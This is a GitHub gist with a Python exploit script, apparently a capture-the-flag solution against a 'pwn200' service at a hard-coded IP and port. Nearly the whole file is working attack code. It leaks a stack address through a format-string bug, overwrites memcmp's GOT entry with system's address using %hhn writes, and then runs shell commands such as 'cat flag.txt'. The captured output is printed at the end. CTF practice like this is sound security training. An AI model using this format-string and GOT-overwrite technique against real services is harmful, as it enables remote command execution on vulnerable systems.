Create a gist now

Instantly share code, notes, and snippets.

@balidani /exploit.py Secret
Created Apr 27, 2014

What would you like to do?
import socket
import struct
HOST = '23.253.207.179'
PORT = 10002
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
def send_payload(payload):
global s
payload = payload + "A" * (63 - len(payload))
s.recv(1024)
s.send(payload + "\n")
s.recv(1024)
s.send("9\n")
for x in range(9):
s.recv(1024)
s.send("-1111111111\n")
res = s.recv(1024)
return res.split("\n")[1]
def calc_format(ch, so_far):
val = ord(ch)
if val < so_far:
val += 256
return (val - so_far, val % 256)
# Leak address
payload = "tan %08x "
result = send_payload(payload)
result = result.split("[")[0].split(" ")[1:-1]
leaked_addr = int(result[0], 16)
print "Leaked addr:", "%x" % leaked_addr
memcmp_got_addr = leaked_addr - 0x148
system_real_addr = struct.pack("I", leaked_addr - 0x32D2)
print "System addr:", system_real_addr[::-1].encode('hex')
memcmp_0 = struct.pack("I", memcmp_got_addr)
memcmp_1 = struct.pack("I", memcmp_got_addr + 1)
memcmp_2 = struct.pack("I", memcmp_got_addr + 2)
# Put addresses on the stack
payload = "tan" + memcmp_0 + memcmp_1 + memcmp_2
# Calculate offsets for %hhn
char_count = len(payload) + 308
char_count %= 256
# First byte
value, char_count = calc_format(system_real_addr[0], char_count)
payload += "%%0%dx%%43$hhn" % value
# Second byte
value, char_count = calc_format(system_real_addr[1], char_count)
payload += "%%0%dx%%44$hhn" % value
# Third byte
value, char_count = calc_format(system_real_addr[2], char_count)
payload += "%%0%dx%%45$hhn" % value
print "Sending payload", "%r" % payload
result = send_payload(payload)
s.recv(1024)
s.recv(1024)
# Send a third command, which will be
# passed to system instead of memcmp
# s.send("ls -lsa")
s.send("cat flag.txt")
print s.recv(1024)
"""
$ ls -lsa
total 28
4 drwxr-xr-x 2 root root 4096 Apr 26 08:15 .
4 drwxr-xr-x 3 root root 4096 Apr 25 23:21 ..
4 -rw-r--r-- 1 root root 71 Apr 25 23:22 flag.txt
16 -rwxr-xr-x 1 root root 12580 Apr 26 08:15 pwn200
[ls -lsa] Choose the number of parameters:
$ cat flag.txt
DSCTF_d7b9926c37e5e6b1f796abaf8a3ae7a26050ddb78c4685985321f03d6fd273ba
"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment